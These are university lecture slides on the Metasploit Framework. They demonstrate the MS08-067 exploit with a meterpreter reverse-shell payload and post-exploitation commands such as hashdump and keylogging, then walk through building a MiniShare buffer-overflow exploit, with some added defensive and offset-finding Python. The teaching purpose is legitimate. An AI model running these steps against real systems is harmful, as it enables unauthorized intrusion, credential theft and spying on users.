91.661 Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling


Agenda

• Part 1: The Metasploit Framework
  – Basics
  – Running Metasploit
  – The Exploit
  – Demo
  – More on Exploits

• Part 2: From ‘ploit’ to ‘ploit’
  – Overview
  – Assumptions
  – Environment Setup
  – Ollydbg Introduction
  – Vulnerability Explanation
  – Crafting the Exploit
  – Metasploit Enablers
  – Adding Shellcode

The Metasploit Framework: Basics

• Created in 2003 by HD Moore

• Vitals
  – BSD License
  – 700K lines of Ruby

• Currently produced by Rapid 7

• De facto standard vulnerability development framework
  – Commercial alternatives
    – Rapid 7 has many commercial implementations
    – Immunity's CANVAS
    – Core Impact

The Metasploit Framework: Basics (cont’d)

• Metasploit is a well known anti-forensic and evasion tool

• Modular for ease of development and portability

• msfupdate
  – Get the latest & greatest exploits

• msfconsole
  – The console – also works as a command shell

• Exploit automation
  – db_autopwn
    – Very noisy
    – Requires a database

The Metasploit Framework: Running Metasploit

The Metasploit Framework: The Exploit

• ms08_067_netapi (RANK: Great)
  – This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
  – This attack can be prevented with the MS08-067 patch.

The Metasploit Framework: Demo

The Metasploit Framework: Demo Walkthrough

• msfconsole
  – use exploit/windows/smb/ms08_067_netapi
  – set PAYLOAD windows/meterpreter/reverse_tcp
  – set RHOST 192.168.11.51 [remote host]
  – set LHOST 192.168.11.53 [local host]
  – show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.11.51    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.11.53    yes       The listen address
   LPORT     4444             yes       The listen port

  – exploit

The Metasploit Framework: More about the Exploit

• msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   …
   61  Windows 2003 SP2 Japanese (NO NX)

The Metasploit Framework: Meterpreter Commands

• Commands
  – meterpreter > sysinfo

    System Language : en_US
    OS              : Windows XP (Build 2600, Service Pack 2).
    Computer        : AGABRIEL-B90B23
    Architecture    : x86
    Meterpreter     : x86/win32

  – meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

  – meterpreter > shell

    Process 396 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

  – More
    – hashdump
    – upload
    – webcam_snap
    – keyscan_{start, stop, dump}
    – ps

From ploit to ploit: Overview

…or how to add a generic exploit to your metasploit arsenal

• Q: What can you do with a known vulnerability?
  – Craft an exploit, execute from a command-line
  – What else?

• Metasploit is not perfect, but it has its place.
  – Repository
  – Framework
  – Tools to help build exploits
  – Ease of use

• Generic shellcode vs. robust shellcode

• Challenges:
  – Crafting the exploit
  – Reuse of an exploit

From ploit to ploit: Assumptions

• Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
  – Fuzzing
  – Static disassembly
  – Review of source code
  – Known vulnerability
    – CVE, as found on http://cve.mitre.org/
    – Security Advisory (http://secunia.com/advisories)
  – Known exploit
    – Exploit DB (http://www.exploit-db.com/exploits)

From ploit to ploit: Environment Setup

• Vulnerability: MiniShare HTTP “GET” Request Buffer Overflow Vulnerability

• Exploit: MiniShare Remote Buffer Overflow Exploit (C source)

• Windows XP SP2 (or really any XP version)
• MiniShare 1.4.1
• Ollydbg 1.10
• Backtrack 4
  – Metasploit
  – Python
  – Netcat

From ploit to ploit: Ollydbg Introduction

• Main Pane:
  – CPU instructions (Microsoft Assembler format)

• Memory Pane:
  – Current section of memory where the code is executing

• Registers Pane:
  – EIP: address of the next instruction to be executed
  – ESP: stack pointer

• Stack Pane:
  – Shows the entries on the stack

From ploit to ploit: Vulnerability Explanation

• HTTP GET with a large (>1787 bytes) request
  – GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n

• EIP = 0x41414141
  – Access violation when reading [41414141]
  – EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.

• ESP = the address of the buffer that was overflowed.
  – Note the “AAAAAAAAAAAAAAAAAA……AAAA”
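Seen from the defender's side, the request shape above is easy to recognise on the wire. The check below is an added example (not part of the slides): it parses an HTTP request line and flags a target long enough to reach the overflow, using the 1787-byte figure from the slides; the function names and the sample requests are constructed here.

```python
from typing import Optional, Tuple

# EIP is overwritten 1787 bytes into the GET target (figure from the slides)
EIP_OFFSET = 1787


def parse_request_line(raw: bytes) -> Optional[Tuple[str, bytes, str]]:
    """Split the first line into (method, target, version); None if malformed."""
    line = raw.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    return parts[0].decode("ascii", "replace"), parts[1], parts[2].decode("ascii", "replace")


def inspect_request(raw: bytes, limit: int = EIP_OFFSET) -> dict:
    """Classify one request. An overlong target can reach the saved return
    address; non-printable bytes in a target are typical of raw shellcode."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return {"verdict": "malformed", "target_len": 0, "reasons": []}
    method, target, _version = parsed
    reasons = []
    if len(target) > limit:
        reasons.append(f"target is {len(target)} bytes, more than {limit}")
    if any(b < 0x20 or b > 0x7E for b in target):
        reasons.append("non-printable bytes in target")
    return {"verdict": "alert" if reasons else "ok",
            "method": method, "target_len": len(target), "reasons": reasons}


# Constructed sample traffic (hypothetical): a benign request, an overlong one
# of the shape shown on the slide, and a short one carrying NOP (0x90) bytes.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: 192.168.11.51\r\n\r\n"
OVERLONG = b"GET " + b"A" * 1800 + b" HTTP/1.1\r\n\r\n"
HIGH_BYTES = b"GET /\x90\x90\x90 HTTP/1.1\r\n\r\n"
```

The same length rule can be carried straight into an IDS signature or a reverse proxy limit on request-line size, which is the cheapest mitigation for an unpatched MiniShare.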

From ploit to ploit: Crafting the Exploit

• This approach is different than the lab exercise assigned.
  – We are not overwriting the stack’s return address here
  – Instead, let’s find an instruction in the code to transfer our execution to: \xFF\xE4 = JMP ESP – jump to the address stored in ESP. Overwrite EIP with the address of a JMP ESP instruction.

• More robust to some degree because we will pick an address that is predictable and will work across more systems.
  – In Win XP SP2 there is no randomization of the base location where DLLs are loaded, therefore if we choose a DLL it will work on each system that loads this DLL.
  – The best choice would be a DLL provided with MiniShare; however, there are none, so we revert to using a Windows DLL.
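The predictability this step relies on is the flip side of a module not opting into base randomization. As an added example that is not part of the slides (and goes slightly beyond them: ASLR only arrived with Windows Vista, so an XP SP2 DLL sits at a fixed base regardless), the checker below reads the DllCharacteristics field of a PE header and reports whether the image asks for a randomized base (DYNAMIC_BASE) and declares NX compatibility (NX_COMPAT). The sample header is constructed inline for the test and is not a loadable image.

```python
import struct

# Flag bits in IMAGE_OPTIONAL_HEADER.DllCharacteristics (Microsoft PE format)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image may be relocated (ASLR opt-in)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image declares DEP/NX compatibility

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DLLCHARACTERISTICS_OFFSET = 70  # same offset inside the optional header for PE32 and PE32+


def dll_characteristics(image: bytes) -> int:
    """Walk MZ header -> e_lfanew -> PE signature -> optional header, return the field."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20  # skip signature and 20-byte COFF file header
    magic = struct.unpack_from("<H", image, optional_header)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    return struct.unpack_from("<H", image, optional_header + DLLCHARACTERISTICS_OFFSET)[0]


def assess_mitigations(image: bytes) -> dict:
    """True means the image opts in. A DLL with aslr_opt_in False loads at a fixed
    base on any OS, which is exactly the kind of module a JMP ESP search looks for."""
    flags = dll_characteristics(image)
    return {"aslr_opt_in": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
            "nx_opt_in": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT)}


def build_sample_header(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header for testing only (no sections, not loadable)."""
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    optional = bytearray(224)                                         # PE32 optional header size
    struct.pack_into("<H", optional, 0, PE32_MAGIC)
    struct.pack_into("<H", optional, DLLCHARACTERISTICS_OFFSET, dll_chars)
    return dos + coff + bytes(optional)
```

Run `assess_mitigations` over the DLLs a service loads to list which ones would still be at a predictable address on a system that does support ASLR.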

From ploit to ploit: Metasploit Enablers

• /pentest/exploits/framework3/tools/pattern_create.rb
  – Creates a unique pattern of a user-specified length. Useful for understanding the offsets within the buffer that we overwrite.

• /pentest/exploits/framework3/tools/pattern_offset.rb
  – Returns the location where EIP is overwritten and where ESP points to. Finds offsets using the pattern generated by pattern_create.rb.

• EIP overwritten at 1787 bytes into our buffer
• ESP points to the location 1791 bytes into our buffer
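As an added example (ours, not the Metasploit scripts themselves), the functions below reproduce what pattern_create.rb and pattern_offset.rb do, so the 1787 and 1791 offsets above can be rederived from a crash dump. The function names are ours; `pattern_offset` goes a little beyond the slide in accepting either the four characters seen in a register or the 32-bit value as Ollydbg prints it.

```python
import string

# Metasploit-style cyclic pattern: 3-char chunks "Aa0", "Aa1", ..., "Az9", "Ba0", ...
# Every chunk is distinct within 26*26*10*3 = 20280 bytes, so any 4-byte window
# found in a register identifies exactly where in the buffer it came from.


def pattern_create(length: int) -> str:
    """Return the first `length` bytes of the cyclic pattern (as ASCII text)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds the 20280-byte period of the pattern")


def pattern_offset(pattern: str, value) -> int:
    """Offset of `value` inside `pattern`. `value` is either the 4 characters seen in
    a register/stack dump, or the 32-bit integer the debugger shows for EIP (its
    bytes are reversed because x86 stores the value little-endian)."""
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("ascii")
    else:
        needle = value
    index = pattern.find(needle)
    if index < 0:
        raise ValueError("value does not occur in the pattern")
    return index


def crash_offsets(pattern: str, eip_value: int, esp_bytes: str) -> dict:
    """Combine the two register observations into the offsets the slide reports."""
    return {"eip": pattern_offset(pattern, eip_value),
            "esp": pattern_offset(pattern, esp_bytes)}
```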

From ploit to ploit: Adding Shellcode

• Using msfpayload, which comes with Metasploit, we will create a useful piece of shellcode which creates a reverse shell on a port.
  – What is a reverse shell?
  – Note: Does this give us away?!
  – C style output (‘C’) vs. raw output (‘R’)

• Does anyone see a problem with some of this shellcode?
  – msfencode can help us…

• Let’s add some NOPs to help improve stability.

• Now all that would need to be done is to add this to Metasploit as a Ruby script. (Note: It’s already in there)

References and Conclusions

• http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

• This presentation just begins to scratch the surface
  – http://www.offensive-security.com/metasploit-unleashed/Metasploitable

Questions?

The Metasploit Framework: The Exploit (2)

• psexec
  – Light-weight telnet replacement that lets you execute processes on other systems
  – This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
  – This one has more, list ‘em

The Exploit (3)

• ms05_039_pnp
  – Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege
  – This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.
  – Affected Systems: Win2k SP4, Win XP SP2, etc…